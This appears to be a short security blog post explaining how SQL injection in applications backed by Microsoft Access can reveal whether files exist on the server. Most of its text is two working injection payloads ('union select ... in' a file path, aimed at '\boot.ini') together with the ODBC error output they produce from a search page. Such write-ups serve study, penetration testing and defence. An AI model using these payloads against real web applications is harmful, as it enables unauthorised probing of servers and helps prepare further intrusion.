Archive for the 'SQL Injection' Category

SQL Injection and Microsoft Access

An unauthenticated SQL Injection point in an application using a Microsoft Access database will probably not lead to sensitive information leakage. However, it is still possible to use the error messages from Access to verify if a specific file exists in the server file system or not:

Injection: ‘ union select 1 from blah in ‘\foo’ where 1=1 or ‘a’=’

Microsoft OLE DB Provider for ODBC Drivers error ‘80004005’
[Microsoft][ODBC Microsoft Access Driver] Could not find file ‘c:\foo’.
/search/sub_search.asp, line 209

Injection: ‘ union select 1 from blah in ‘\boot.ini’ where 1=1 or ‘a’=’

Microsoft OLE DB Provider for ODBC Drivers error ‘80004005’
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format ‘c:\boot.ini’.
/search/sub_search.asp, line 209